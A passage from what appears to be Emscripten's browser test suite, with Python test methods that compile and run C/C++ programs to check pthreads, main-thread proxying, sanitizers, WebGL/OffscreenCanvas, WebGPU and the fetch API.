self.btest_exit(test_file('pthread/test_pthread_sbrk.cpp'), args=['-O3', '-sUSE_PTHREADS', '-sPTHREAD_POOL_SIZE=8', '-sABORTING_MALLOC=' + str(aborting_malloc), '-DABORTING_MALLOC=' + str(aborting_malloc), '-sINITIAL_MEMORY=128MB'])
# Test that -sABORTING_MALLOC=0 works in both pthreads and non-pthreads builds. (sbrk fails gracefully)
@requires_threads
def test_pthread_gauge_available_memory(self):
for opts in [[], ['-O2']]:
for args in [[], ['-sUSE_PTHREADS']]:
self.btest(test_file('gauge_available_memory.cpp'), expected='1', args=['-sABORTING_MALLOC=0'] + args + opts)
# Test that the proxying operations of user code from pthreads to main thread work
@requires_threads
def test_pthread_run_on_main_thread(self):
self.btest_exit(test_file('pthread/test_pthread_run_on_main_thread.cpp'), args=['-O3', '-sUSE_PTHREADS', '-sPTHREAD_POOL_SIZE'])
# Test how a lot of back-to-back called proxying operations behave.
@requires_threads
def test_pthread_run_on_main_thread_flood(self):
self.btest_exit(test_file('pthread/test_pthread_run_on_main_thread_flood.cpp'), args=['-O3', '-sUSE_PTHREADS', '-sPTHREAD_POOL_SIZE'])
# Test that it is possible to asynchronously call a JavaScript function on the main thread.
@requires_threads
def test_pthread_call_async(self):
self.btest_exit(test_file('pthread/call_async.c'), args=['-sUSE_PTHREADS'])
# Test that it is possible to synchronously call a JavaScript function on the main thread and get a return value back.
@requires_threads
def test_pthread_call_sync_on_main_thread(self):
self.btest_exit(test_file('pthread/call_sync_on_main_thread.c'), args=['-O3', '-sUSE_PTHREADS', '-sPROXY_TO_PTHREAD', '-DPROXY_TO_PTHREAD=1', '--js-library', test_file('pthread/call_sync_on_main_thread.js')])
self.btest_exit(test_file('pthread/call_sync_on_main_thread.c'), args=['-O3', '-sUSE_PTHREADS', '-DPROXY_TO_PTHREAD=0', '--js-library', test_file('pthread/call_sync_on_main_thread.js')])
self.btest_exit(test_file('pthread/call_sync_on_main_thread.c'), args=['-Oz', '-DPROXY_TO_PTHREAD=0', '--js-library', test_file('pthread/call_sync_on_main_thread.js'), '-sEXPORTED_FUNCTIONS=_main,_malloc'])
# Test that it is possible to asynchronously call a JavaScript function on the main thread.
@requires_threads
def test_pthread_call_async_on_main_thread(self):
self.btest(test_file('pthread/call_async_on_main_thread.c'), expected='7', args=['-O3', '-sUSE_PTHREADS', '-sPROXY_TO_PTHREAD', '-DPROXY_TO_PTHREAD=1', '--js-library', test_file('pthread/call_async_on_main_thread.js')])
self.btest(test_file('pthread/call_async_on_main_thread.c'), expected='7', args=['-O3', '-sUSE_PTHREADS', '-DPROXY_TO_PTHREAD=0', '--js-library', test_file('pthread/call_async_on_main_thread.js')])
self.btest(test_file('pthread/call_async_on_main_thread.c'), expected='7', args=['-Oz', '-DPROXY_TO_PTHREAD=0', '--js-library', test_file('pthread/call_async_on_main_thread.js')])
# Tests that spawning a new thread does not cause a reinitialization of the global data section of the application memory area.
@requires_threads
def test_pthread_global_data_initialization(self):
mem_init_modes = [[], ['--memory-init-file', '0'], ['--memory-init-file', '1']]
for mem_init_mode in mem_init_modes:
for args in [['-sMODULARIZE', '-sEXPORT_NAME=MyModule', '--shell-file', test_file('shell_that_launches_modularize.html')], ['-O3']]:
self.btest_exit(test_file('pthread/test_pthread_global_data_initialization.c'), args=args + mem_init_mode + ['-sUSE_PTHREADS', '-sPROXY_TO_PTHREAD', '-sPTHREAD_POOL_SIZE'])
@requires_threads
@requires_sync_compilation
def test_pthread_global_data_initialization_in_sync_compilation_mode(self):
mem_init_modes = [[], ['--memory-init-file', '0'], ['--memory-init-file', '1']]
for mem_init_mode in mem_init_modes:
args = ['-sWASM_ASYNC_COMPILATION=0']
self.btest_exit(test_file('pthread/test_pthread_global_data_initialization.c'), args=args + mem_init_mode + ['-sUSE_PTHREADS', '-sPROXY_TO_PTHREAD', '-sPTHREAD_POOL_SIZE'])
# Test that emscripten_get_now() reports coherent wallclock times across all pthreads, instead of each pthread independently reporting wallclock times since the launch of that pthread.
@requires_threads
def test_pthread_clock_drift(self):
self.btest_exit(test_file('pthread/test_pthread_clock_drift.cpp'), args=['-O3', '-sUSE_PTHREADS', '-sPROXY_TO_PTHREAD'])
@requires_threads
def test_pthread_utf8_funcs(self):
self.btest_exit(test_file('pthread/test_pthread_utf8_funcs.cpp'), args=['-sUSE_PTHREADS', '-sPTHREAD_POOL_SIZE'])
# Test the emscripten_futex_wake(addr, INT_MAX); functionality to wake all waiters
@also_with_wasm2js
@requires_threads
def test_pthread_wake_all(self):
self.btest_exit(test_file('pthread/test_futex_wake_all.cpp'), args=['-O3', '-sUSE_PTHREADS', '-sINITIAL_MEMORY=64MB'])
# Test that stack base and max correctly bound the stack on pthreads.
@requires_threads
def test_pthread_stack_bounds(self):
self.btest_exit(test_file('pthread/test_pthread_stack_bounds.cpp'), args=['-sUSE_PTHREADS'])
# Test that real `thread_local` works.
@requires_threads
def test_pthread_tls(self):
self.btest_exit(test_file('pthread/test_pthread_tls.cpp'), args=['-sPROXY_TO_PTHREAD', '-sUSE_PTHREADS'])
# Test that real `thread_local` works in main thread without PROXY_TO_PTHREAD.
@requires_threads
def test_pthread_tls_main(self):
self.btest_exit(test_file('pthread/test_pthread_tls_main.cpp'), args=['-sUSE_PTHREADS'])
@requires_threads
def test_pthread_safe_stack(self):
# Note that as the test runs with PROXY_TO_PTHREAD, we set TOTAL_STACK,
# and not DEFAULT_PTHREAD_STACK_SIZE, as the pthread for main() gets the
# same stack size as the main thread normally would.
self.btest(test_file('core/test_safe_stack.c'), expected='abort:stack overflow', args=['-sUSE_PTHREADS', '-sPROXY_TO_PTHREAD', '-sSTACK_OVERFLOW_CHECK=2', '-sTOTAL_STACK=64KB'])
@parameterized({
'leak': ['test_pthread_lsan_leak', ['-gsource-map']],
'no_leak': ['test_pthread_lsan_no_leak'],
})
@requires_threads
@no_firefox('https://github.com/emscripten-core/emscripten/issues/15978')
def test_pthread_lsan(self, name, args=[]):
self.btest(test_file('pthread', name + '.cpp'), expected='1', args=['-fsanitize=leak', '-sINITIAL_MEMORY=256MB', '-sUSE_PTHREADS', '-sPROXY_TO_PTHREAD', '--pre-js', test_file('pthread', name + '.js')] + args)
@parameterized({
# Reusing the LSan test files for ASan.
'leak': ['test_pthread_lsan_leak', ['-gsource-map']],
'no_leak': ['test_pthread_lsan_no_leak'],
})
@requires_threads
def test_pthread_asan(self, name, args=[]):
self.btest(test_file('pthread', name + '.cpp'), expected='1', args=['-fsanitize=address', '-sINITIAL_MEMORY=256MB', '-sUSE_PTHREADS', '-sPROXY_TO_PTHREAD', '--pre-js', test_file('pthread', name + '.js')] + args)
@requires_threads
def test_pthread_asan_use_after_free(self):
self.btest(test_file('pthread/test_pthread_asan_use_after_free.cpp'), expected='1', args=['-fsanitize=address', '-sINITIAL_MEMORY=256MB', '-sUSE_PTHREADS', '-sPROXY_TO_PTHREAD', '--pre-js', test_file('pthread/test_pthread_asan_use_after_free.js')])
@requires_threads
def test_pthread_asan_use_after_free_2(self):
# similar to test_pthread_asan_use_after_free, but using a pool instead
# of proxy-to-pthread, and also the allocation happens on the pthread
# (which tests that it can use the offset converter to get the stack
# trace there)
self.btest(test_file('pthread/test_pthread_asan_use_after_free_2.cpp'), expected='1', args=['-fsanitize=address', '-sINITIAL_MEMORY=256MB', '-sUSE_PTHREADS', '-sPTHREAD_POOL_SIZE=1', '--pre-js', test_file('pthread/test_pthread_asan_use_after_free_2.js')])
@requires_threads
def test_pthread_exit_process(self):
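# Uses the core test's pre.js; the page is expected to report 'onExit status: 42' when the runtime exits.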
args = ['-sUSE_PTHREADS',
'-sPROXY_TO_PTHREAD',
'-sPTHREAD_POOL_SIZE=2',
'-sEXIT_RUNTIME',
'-DEXIT_RUNTIME',
'-O0']
args += ['--pre-js', test_file('core/pthread/test_pthread_exit_runtime.pre.js')]
self.btest(test_file('core/pthread/test_pthread_exit_runtime.c'), expected='onExit status: 42', args=args)
@requires_threads
def test_pthread_trap(self):
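# The pre.js below listens for the window 'error' event and reports success when the expected
# 'unreachable' trap message is seen.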
create_file('pre.js', '''
if (typeof window === 'object' && window) {
window.addEventListener('error', function(e) {
if (e.error && e.error.message.includes('unreachable'))
maybeReportResultToServer("expected exception caught");
else
maybeReportResultToServer("unexpected: " + e);
});
}''')
args = ['-sUSE_PTHREADS',
'-sPROXY_TO_PTHREAD',
'-sEXIT_RUNTIME',
'--profiling-funcs',
'--pre-js=pre.js']
self.btest(test_file('pthread/test_pthread_trap.c'), expected='expected exception caught', args=args)
# Tests MAIN_THREAD_EM_ASM_INT() function call signatures.
def test_main_thread_em_asm_signatures(self):
self.btest_exit(test_file('core/test_em_asm_signatures.cpp'), assert_returncode=121, args=[])
@requires_threads
def test_main_thread_em_asm_signatures_pthreads(self):
self.btest_exit(test_file('core/test_em_asm_signatures.cpp'), assert_returncode=121, args=['-O3', '-sUSE_PTHREADS', '-sPROXY_TO_PTHREAD', '-sASSERTIONS'])
@requires_threads
def test_main_thread_async_em_asm(self):
self.btest_exit(test_file('core/test_main_thread_async_em_asm.cpp'), args=['-O3', '-sUSE_PTHREADS', '-sPROXY_TO_PTHREAD', '-sASSERTIONS'])
@requires_threads
def test_main_thread_em_asm_blocking(self):
create_file('page.html', read_file(test_file('browser/test_em_asm_blocking.html')))
self.compile_btest([test_file('browser/test_em_asm_blocking.cpp'), '-O2', '-o', 'wasm.js', '-sUSE_PTHREADS', '-sPROXY_TO_PTHREAD'])
self.run_browser('page.html', '', '/report_result?8')
# Test that it is possible to send a signal by calling alarm(timeout), which in turn invokes the signal handler set by signal(SIGALRM, func).
def test_sigalrm(self):
self.btest_exit(test_file('test_sigalrm.c'), args=['-O3'])
def test_canvas_style_proxy(self):
self.btest('canvas_style_proxy.c', expected='1', args=['--proxy-to-worker', '--shell-file', test_file('canvas_style_proxy_shell.html'), '--pre-js', test_file('canvas_style_proxy_pre.js')])
def test_canvas_size_proxy(self):
self.btest(test_file('canvas_size_proxy.c'), expected='0', args=['--proxy-to-worker'])
def test_custom_messages_proxy(self):
self.btest(test_file('custom_messages_proxy.c'), expected='1', args=['--proxy-to-worker', '--shell-file', test_file('custom_messages_proxy_shell.html'), '--post-js', test_file('custom_messages_proxy_postjs.js')])
def test_vanilla_html_when_proxying(self):
for opts in [0, 1, 2]:
print(opts)
self.compile_btest([test_file('browser_test_hello_world.c'), '-o', 'test.js', '-O' + str(opts), '--proxy-to-worker'])
create_file('test.html', '<script src="test.js"></script>')
self.run_browser('test.html', None, '/report_result?0')
def test_in_flight_memfile_request(self):
# test the XHR for an asm.js mem init file being in flight already
for o in [0, 1, 2]:
print(o)
opts = ['-O' + str(o), '-sWASM=0']
print('plain html')
self.compile_btest([test_file('in_flight_memfile_request.c'), '-o', 'test.js'] + opts)
create_file('test.html', '<script src="test.js"></script>')
self.run_browser('test.html', None, '/report_result?0') # never when we provide our own HTML like this.
print('default html')
self.btest('in_flight_memfile_request.c', expected='0' if o < 2 else '1', args=opts) # should happen when there is a mem init file (-O2+)
@requires_sync_compilation
def test_binaryen_async(self):
# notice when we use async compilation
script = '''
<script>
// note if we do async compilation
var real_wasm_instantiate = WebAssembly.instantiate;
var real_wasm_instantiateStreaming = WebAssembly.instantiateStreaming;
if (typeof real_wasm_instantiateStreaming === 'function') {
WebAssembly.instantiateStreaming = function(a, b) {
Module.sawAsyncCompilation = true;
return real_wasm_instantiateStreaming(a, b);
};
} else {
WebAssembly.instantiate = function(a, b) {
Module.sawAsyncCompilation = true;
return real_wasm_instantiate(a, b);
};
}
// show stderr for the viewer's fun
err = function(x) {
out('<<< ' + x + ' >>>');
console.log(x);
};
</script>
{{{ SCRIPT }}}
'''
shell_with_script('shell.html', 'shell.html', script)
common_args = ['--shell-file', 'shell.html']
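# The expected exit code tracks whether async compilation should be observed: the shell script above
# sets Module.sawAsyncCompilation, and forcing -sWASM_ASYNC_COMPILATION=0 is the only case expected to report 0.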
for opts, returncode in [
([], 1),
(['-O1'], 1),
(['-O2'], 1),
(['-O3'], 1),
(['-sWASM_ASYNC_COMPILATION'], 1), # force it on
(['-O1', '-sWASM_ASYNC_COMPILATION=0'], 0), # force it off
]:
print(opts, returncode)
self.btest_exit('binaryen_async.c', assert_returncode=returncode, args=common_args + opts)
# Ensure that compilation still works and is async without instantiateStreaming available
no_streaming = ' <script> WebAssembly.instantiateStreaming = undefined;</script>'
shell_with_script('shell.html', 'shell.html', no_streaming + script)
self.btest_exit('binaryen_async.c', assert_returncode=1, args=common_args)
# Test that implementing Module.instantiateWasm() callback works.
@parameterized({
'': ([],),
'asan': (['-fsanitize=address', '-sINITIAL_MEMORY=128MB'],)
})
def test_manual_wasm_instantiate(self, args=[]):
self.compile_btest([test_file('manual_wasm_instantiate.cpp'), '-o', 'manual_wasm_instantiate.js'] + args)
shutil.copyfile(test_file('manual_wasm_instantiate.html'), 'manual_wasm_instantiate.html')
self.run_browser('manual_wasm_instantiate.html', 'wasm instantiation succeeded', '/report_result?1')
def test_wasm_locate_file(self):
# Test that it is possible to define a "Module.locateFile(foo)" function to locate where test.wasm will be loaded from.
ensure_dir('cdn')
create_file('shell2.html', read_file(path_from_root('src/shell.html')).replace('var Module = {', 'var Module = { locateFile: function(filename) { if (filename == "test.wasm") return "cdn/test.wasm"; else return filename; }, '))
self.compile_btest([test_file('browser_test_hello_world.c'), '--shell-file', 'shell2.html', '-o', 'test.html'])
shutil.move('test.wasm', Path('cdn/test.wasm'))
self.run_browser('test.html', '', '/report_result?0')
@also_with_threads
def test_utf8_textdecoder(self):
self.btest_exit('benchmark_utf8.cpp', 0, args=['--embed-file', test_file('utf8_corpus.txt') + '@/utf8_corpus.txt', '-sEXPORTED_RUNTIME_METHODS=[UTF8ToString]'])
@also_with_threads
def test_utf16_textdecoder(self):
self.btest_exit('benchmark_utf16.cpp', 0, args=['--embed-file', test_file('utf16_corpus.txt') + '@/utf16_corpus.txt', '-sEXPORTED_RUNTIME_METHODS=[UTF16ToString,stringToUTF16,lengthBytesUTF16]'])
@also_with_threads
def test_TextDecoder(self):
self.btest('browser_test_hello_world.c', '0', args=['-sTEXTDECODER=0'])
just_fallback = os.path.getsize('test.js')
self.btest('browser_test_hello_world.c', '0')
td_with_fallback = os.path.getsize('test.js')
self.btest('browser_test_hello_world.c', '0', args=['-sTEXTDECODER=2'])
td_without_fallback = os.path.getsize('test.js')
# pthread TextDecoder support is more complex due to
# https://github.com/whatwg/encoding/issues/172
# and therefore the expected code size win there is actually a loss
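# Expected size relations: the TEXTDECODER=0 build should always be smaller than the default build
# (TextDecoder plus fallback), while the TEXTDECODER=2 build is only smaller than TEXTDECODER=0 when not using pthreads.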
if '-pthread' not in self.emcc_args:
self.assertLess(td_without_fallback, just_fallback)
else:
self.assertGreater(td_without_fallback, just_fallback)
self.assertLess(just_fallback, td_with_fallback)
def test_small_js_flags(self):
self.btest('browser_test_hello_world.c', '0', args=['-O3', '--closure=1', '-sINCOMING_MODULE_JS_API=[]', '-sENVIRONMENT=web'])
# Check an absolute js code size, with some slack.
size = os.path.getsize('test.js')
print('size:', size)
# Note that this size includes test harness additions (for reporting the result, etc.).
self.assertLess(abs(size - 5500), 100)
# Tests that it is possible to initialize and render WebGL content in a pthread by using OffscreenCanvas.
# -DTEST_CHAINED_WEBGL_CONTEXT_PASSING: Tests that it is possible to transfer WebGL canvas in a chain from main thread -> thread 1 -> thread 2 and then init and render WebGL content there.
@no_chrome('see https://crbug.com/961765')
@requires_threads
@requires_offscreen_canvas
@requires_graphics_hardware
def test_webgl_offscreen_canvas_in_pthread(self):
for args in [[], ['-DTEST_CHAINED_WEBGL_CONTEXT_PASSING']]:
self.btest('gl_in_pthread.cpp', expected='1', args=args + ['-sUSE_PTHREADS', '-sPTHREAD_POOL_SIZE=2', '-sOFFSCREENCANVAS_SUPPORT', '-lGL'])
# Tests that it is possible to render WebGL content on a <canvas> on the main thread, after it has first been used to render WebGL content in a pthread
# -DTEST_MAIN_THREAD_EXPLICIT_COMMIT: Test the same (WebGL on main thread after pthread), but by using explicit .commit() to swap on the main thread instead of implicit "swap when rAF ends" logic
@requires_threads
@requires_offscreen_canvas
@requires_graphics_hardware
@disabled('This test is disabled because current OffscreenCanvas does not allow transfering it after a rendering context has been created for it.')
def test_webgl_offscreen_canvas_in_mainthread_after_pthread(self):
for args in [[], ['-DTEST_MAIN_THREAD_EXPLICIT_COMMIT']]:
self.btest('gl_in_mainthread_after_pthread.cpp', expected='0', args=args + ['-sUSE_PTHREADS', '-sPTHREAD_POOL_SIZE=2', '-sOFFSCREENCANVAS_SUPPORT', '-lGL'])
@requires_threads
@requires_offscreen_canvas
@requires_graphics_hardware
def test_webgl_offscreen_canvas_only_in_pthread(self):
self.btest_exit('gl_only_in_pthread.cpp', args=['-sUSE_PTHREADS', '-sPTHREAD_POOL_SIZE', '-sOFFSCREENCANVAS_SUPPORT', '-lGL', '-sOFFSCREEN_FRAMEBUFFER'])
# Tests that rendering from client side memory without default-enabling extensions works.
@requires_graphics_hardware
def test_webgl_from_client_side_memory_without_default_enabled_extensions(self):
self.btest_exit('webgl_draw_triangle.c', args=['-lGL', '-sOFFSCREEN_FRAMEBUFFER', '-DEXPLICIT_SWAP=1', '-DDRAW_FROM_CLIENT_MEMORY=1', '-sFULL_ES2=1'])
# Tests for WEBGL_multi_draw extension
# For testing WebGL draft extensions like this, if using Chrome as the browser,
# we might want to append --enable-webgl-draft-extensions to the EMTEST_BROWSER env arg.
@requires_graphics_hardware
def test_webgl_multi_draw(self):
self.btest('webgl_multi_draw_test.c', reference='webgl_multi_draw.png',
args=['-lGL', '-sOFFSCREEN_FRAMEBUFFER', '-DMULTI_DRAW_ARRAYS=1', '-DEXPLICIT_SWAP=1'])
self.btest('webgl_multi_draw_test.c', reference='webgl_multi_draw.png',
args=['-lGL', '-sOFFSCREEN_FRAMEBUFFER', '-DMULTI_DRAW_ARRAYS_INSTANCED=1', '-DEXPLICIT_SWAP=1'])
self.btest('webgl_multi_draw_test.c', reference='webgl_multi_draw.png',
args=['-lGL', '-sOFFSCREEN_FRAMEBUFFER', '-DMULTI_DRAW_ELEMENTS=1', '-DEXPLICIT_SWAP=1'])
self.btest('webgl_multi_draw_test.c', reference='webgl_multi_draw.png',
args=['-lGL', '-sOFFSCREEN_FRAMEBUFFER', '-DMULTI_DRAW_ELEMENTS_INSTANCED=1', '-DEXPLICIT_SWAP=1'])
# Tests for base_vertex/base_instance extension
# For testing WebGL draft extensions like this, if using Chrome as the browser,
# we might want to append --enable-webgl-draft-extensions to the EMTEST_BROWSER env arg.
# If testing on Mac, you also need --use-cmd-decoder=passthrough to get this extension.
# There is also a known bug with baseInstance on Mac Intel which can fail to produce the expected image result.
@requires_graphics_hardware
def test_webgl_draw_base_vertex_base_instance(self):
for multiDraw in [0, 1]:
for drawElements in [0, 1]:
self.btest('webgl_draw_base_vertex_base_instance_test.c', reference='webgl_draw_instanced_base_vertex_base_instance.png',
args=['-lGL',
'-sMAX_WEBGL_VERSION=2',
'-sOFFSCREEN_FRAMEBUFFER',
'-DMULTI_DRAW=' + str(multiDraw),
'-DDRAW_ELEMENTS=' + str(drawElements),
'-DEXPLICIT_SWAP=1',
'-DWEBGL_CONTEXT_VERSION=2'])
@requires_graphics_hardware
def test_webgl_sample_query(self):
cmd = ['-sMAX_WEBGL_VERSION=2', '-lGL']
self.btest_exit('webgl_sample_query.cpp', args=cmd)
@requires_graphics_hardware
def test_webgl_timer_query(self):
for args in [
# EXT query entrypoints on WebGL 1.0
['-sMAX_WEBGL_VERSION'],
# builtin query entrypoints on WebGL 2.0
['-sMAX_WEBGL_VERSION=2', '-DTEST_WEBGL2'],
# EXT query entrypoints on a WebGL 1.0 context while built for WebGL 2.0
['-sMAX_WEBGL_VERSION=2'],
]:
cmd = args + ['-lGL']
self.btest_exit('webgl_timer_query.cpp', args=cmd)
# Tests that -sOFFSCREEN_FRAMEBUFFER rendering works.
@requires_graphics_hardware
def test_webgl_offscreen_framebuffer(self):
# Tests all the different possible versions of libgl
for threads in [[], ['-sUSE_PTHREADS', '-sPROXY_TO_PTHREAD']]:
for version in [[], ['-sFULL_ES3'], ['-sFULL_ES3']]:
args = ['-lGL', '-sOFFSCREEN_FRAMEBUFFER', '-DEXPLICIT_SWAP=1'] + threads + version
print('with args: %s' % str(args))
self.btest_exit('webgl_draw_triangle.c', args=args)
# Tests that VAOs can be used even if WebGL enableExtensionsByDefault is set to 0.
@requires_graphics_hardware
def test_webgl_vao_without_automatic_extensions(self):
self.btest_exit('test_webgl_no_auto_init_extensions.c', args=['-lGL', '-sGL_SUPPORT_AUTOMATIC_ENABLE_EXTENSIONS=0'])
# Tests that offscreen framebuffer state restoration works
@requires_graphics_hardware
def test_webgl_offscreen_framebuffer_state_restoration(self):
for args in [
# full state restoration path on WebGL 1.0
['-sMAX_WEBGL_VERSION', '-sOFFSCREEN_FRAMEBUFFER_FORBID_VAO_PATH'],
# VAO path on WebGL 1.0
['-sMAX_WEBGL_VERSION'],
['-sMAX_WEBGL_VERSION=2', '-DTEST_WEBGL2=0'],
# VAO path on WebGL 2.0
['-sMAX_WEBGL_VERSION=2', '-DTEST_WEBGL2=1', '-DTEST_ANTIALIAS=1', '-DTEST_REQUIRE_VAO=1'],
# full state restoration path on WebGL 2.0
['-sMAX_WEBGL_VERSION=2', '-DTEST_WEBGL2=1', '-DTEST_ANTIALIAS=1', '-sOFFSCREEN_FRAMEBUFFER_FORBID_VAO_PATH'],
# blitFramebuffer path on WebGL 2.0 (falls back to VAO on Firefox < 67)
['-sMAX_WEBGL_VERSION=2', '-DTEST_WEBGL2=1', '-DTEST_ANTIALIAS=0'],
]:
cmd = args + ['-lGL', '-sOFFSCREEN_FRAMEBUFFER', '-DEXPLICIT_SWAP=1']
self.btest_exit('webgl_offscreen_framebuffer_swap_with_bad_state.c', args=cmd)
# Tests that -sWORKAROUND_OLD_WEBGL_UNIFORM_UPLOAD_IGNORED_OFFSET_BUG rendering works.
@requires_graphics_hardware
def test_webgl_workaround_webgl_uniform_upload_bug(self):
self.btest_exit('webgl_draw_triangle_with_uniform_color.c', args=['-lGL', '-sWORKAROUND_OLD_WEBGL_UNIFORM_UPLOAD_IGNORED_OFFSET_BUG'])
# Tests that using an array of structs in GL uniforms works.
@requires_graphics_hardware
def test_webgl_array_of_structs_uniform(self):
self.btest('webgl_array_of_structs_uniform.c', args=['-lGL', '-sMAX_WEBGL_VERSION=2'], reference='webgl_array_of_structs_uniform.png')
# Tests that if a WebGL context is created in a pthread on a canvas that has not been transferred to that pthread, WebGL calls are then proxied to the main thread
# -DTEST_OFFSCREEN_CANVAS=1: Tests that if a WebGL context is created on a pthread that has the canvas transferred to it by using Emscripten's EMSCRIPTEN_PTHREAD_TRANSFERRED_CANVASES="#canvas", then OffscreenCanvas is used
# -DTEST_OFFSCREEN_CANVAS=2: Tests that if a WebGL context is created on a pthread that has the canvas transferred to it via the automatic transfer of Module.canvas when EMSCRIPTEN_PTHREAD_TRANSFERRED_CANVASES is not defined, then OffscreenCanvas is also used
@parameterized({
'': ([False],),
'asyncify': ([True],),
})
@requires_threads
@requires_offscreen_canvas
@requires_graphics_hardware
def test_webgl_offscreen_canvas_in_proxied_pthread(self, asyncify):
cmd = ['-sUSE_PTHREADS', '-sOFFSCREENCANVAS_SUPPORT', '-lGL', '-sGL_DEBUG', '-sPROXY_TO_PTHREAD']
if asyncify:
# given the synchronous render loop here, asyncify is needed to see intermediate frames and
# the gradual color change
cmd += ['-sASYNCIFY', '-DASYNCIFY']
print(str(cmd))
self.btest_exit('gl_in_proxy_pthread.cpp', args=cmd)
@parameterized({
'proxy': (['-sPROXY_TO_PTHREAD'],),
'': ([],),
})
@requires_threads
@requires_graphics_hardware
@requires_offscreen_canvas
def test_webgl_resize_offscreencanvas_from_main_thread(self, args):
for args2 in [[], ['-DTEST_SYNC_BLOCKING_LOOP=1']]:
for args3 in [[], ['-sOFFSCREENCANVAS_SUPPORT', '-sOFFSCREEN_FRAMEBUFFER']]:
cmd = args + args2 + args3 + ['-sUSE_PTHREADS', '-lGL', '-sGL_DEBUG']
print(str(cmd))
self.btest_exit('resize_offscreencanvas_from_main_thread.cpp', args=cmd)
@requires_graphics_hardware
def test_webgl_simple_enable_extensions(self):
for webgl_version in [1, 2]:
for simple_enable_extensions in [0, 1]:
cmd = ['-DWEBGL_CONTEXT_VERSION=' + str(webgl_version),
'-DWEBGL_SIMPLE_ENABLE_EXTENSION=' + str(simple_enable_extensions),
'-sMAX_WEBGL_VERSION=2',
'-sGL_SUPPORT_AUTOMATIC_ENABLE_EXTENSIONS=' + str(simple_enable_extensions),
'-sGL_SUPPORT_SIMPLE_ENABLE_EXTENSIONS=' + str(simple_enable_extensions)]
self.btest_exit('webgl2_simple_enable_extensions.c', args=cmd)
@requires_graphics_hardware
def test_webgpu_basic_rendering(self):
for args in [[], ['-sASSERTIONS', '--closure=1'], ['-sMAIN_MODULE=1']]:
self.btest_exit('webgpu_basic_rendering.cpp', args=['-sUSE_WEBGPU'] + args)
def test_webgpu_get_device(self):
for args in [['-sASSERTIONS', '--closure=1']]:
self.btest_exit('webgpu_get_device.cpp', args=['-sUSE_WEBGPU'] + args)
# Tests the feature that the shell html page can preallocate the typed array and place it
# in Module.buffer before loading the script.
# In this build mode, the -sINITIAL_MEMORY=xxx option will be ignored.
# Preallocating the buffer in this way is asm.js only (wasm needs a Memory).
def test_preallocated_heap(self):
self.btest_exit('test_preallocated_heap.cpp', args=['-sWASM=0', '-sINITIAL_MEMORY=16MB', '-sABORTING_MALLOC=0', '--shell-file', test_file('test_preallocated_heap_shell.html')])
# Tests emscripten_fetch() usage to XHR data directly to memory without persisting results to IndexedDB.
@also_with_wasm2js
def test_fetch_to_memory(self):
# Test error reporting in the negative case when the file URL doesn't exist. (http 404)
self.btest_exit('fetch/to_memory.cpp',
args=['-sFETCH_DEBUG', '-sFETCH', '-DFILE_DOES_NOT_EXIST'])
# Test the positive case when the file URL exists. (http 200)
shutil.copyfile(test_file('gears.png'), 'gears.png')
for arg in [[], ['-sFETCH_SUPPORT_INDEXEDDB=0']]:
self.btest_exit('fetch/to_memory.cpp',
args=['-sFETCH_DEBUG', '-sFETCH'] + arg)
@parameterized({
'': ([],),
'pthread_exit': (['-DDO_PTHREAD_EXIT'],),
})
@no_firefox('https://github.com/emscripten-core/emscripten/issues/16868')
@requires_threads
def test_fetch_from_thread(self, args):
shutil.copyfile(test_file('gears.png'), 'gears.png')
self.btest_exit('fetch/from_thread.cpp',
args=args + ['-sUSE_PTHREADS', '-sPROXY_TO_PTHREAD', '-sFETCH_DEBUG', '-sFETCH', '-DFILE_DOES_NOT_EXIST'],
also_wasm2js=True)
@also_with_wasm2js
def test_fetch_to_indexdb(self):
shutil.copyfile(test_file('gears.png'), 'gears.png')
self.btest_exit('fetch/to_indexeddb.cpp',
args=['-sFETCH_DEBUG', '-sFETCH'])
# Tests emscripten_fetch() usage to persist an XHR into IndexedDB and subsequently load up from there.
@also_with_wasm2js
def test_fetch_cached_xhr(self):
shutil.copyfile(test_file('gears.png'), 'gears.png')
self.btest_exit('fetch/cached_xhr.cpp',
args=['-sFETCH_DEBUG', '-sFETCH'])
# Tests that response headers get set on emscripten_fetch_t values.
@no_firefox('https://github.com/emscripten-core/emscripten/issues/16868')
@also_with_wasm2js
@requires_threads
def test_fetch_response_headers(self):
shutil.copyfile(test_file('gears.png'), 'gears.png')
self.btest_exit('fetch/response_headers.cpp', args=['-sFETCH_DEBUG', '-sFETCH', '-sUSE_PTHREADS', '-sPROXY_TO_PTHREAD'])
# Test emscripten_fetch() usage to stream an XHR into memory without storing the full file in memory
@also_with_wasm2js
def test_fetch_stream_file(self):
self.skipTest('moz-chunked-arraybuffer was firefox-only and has been removed')
# Strategy: create a large 128MB file, and compile with a small 16MB Emscripten heap, so that the tested file
# won't fully fit in the heap. This verifies that streaming works properly.
s = '12345678'
for i in range(14):
s = s[::-1] + s # length of str will be 2^17=128KB
with open('largefile.txt', 'w') as f:
for i in range(1024):
f.write(s)
self.btest_exit('fetch/stream_file.cpp',
args=['-sFETCH_DEBUG', '-sFETCH', '-sINITIAL_MEMORY=536870912'])
def test_fetch_headers_received(self):
self.btest_exit('fetch/headers_received.cpp', args=['-sFETCH_DEBUG', '-sFETCH'])
# Tests emscripten_fetch() usage in synchronous mode when used from the main
# thread proxied to a Worker with -sPROXY_TO_PTHREAD option.
@no_firefox('https://github.com/emscripten-core/emscripten/issues/16868')
@requires_threads
def test_fetch_sync_xhr(self):
shutil.copyfile(test_file('gears.png'), 'gears.png')
self.btest_exit('fetch/sync_xhr.cpp', args=['-sFETCH_DEBUG', '-sFETCH', '-sUSE_PTHREADS', '-sPROXY_TO_PTHREAD'])
# Tests emscripten_fetch() usage when user passes none of the main 3 flags (append/replace/no_download).
# In that case, append is implicitly understood.
@no_firefox('https://github.com/emscripten-core/emscripten/issues/16868')
@requires_threads
def test_fetch_implicit_append(self):
shutil.copyfile(test_file('gears.png'), 'gears.png')
self.btest_exit('fetch/example_synchronous_fetch.c', args=['-sFETCH', '-sUSE_PTHREADS', '-sPROXY_TO_PTHREAD'])
# Tests synchronous emscripten_fetch() usage from wasm pthread in fastcomp.
@no_firefox('https://github.com/emscripten-core/emscripten/issues/16868')
@requires_threads
def test_fetch_sync_xhr_in_wasm(self):
shutil.copyfile(test_file('gears.png'), 'gears.png')
self.btest_exit('fetch/example_synchronous_fetch.c', args=['-sFETCH', '-sUSE_PTHREADS', '-sPROXY_TO_PTHREAD'])
# Tests that the Fetch API works for synchronous XHRs when used with --proxy-to-worker.
@no_firefox('https://github.com/emscripten-core/emscripten/issues/16868')
@also_with_wasm2js
@requires_threads
def test_fetch_sync_xhr_in_proxy_to_worker(self):
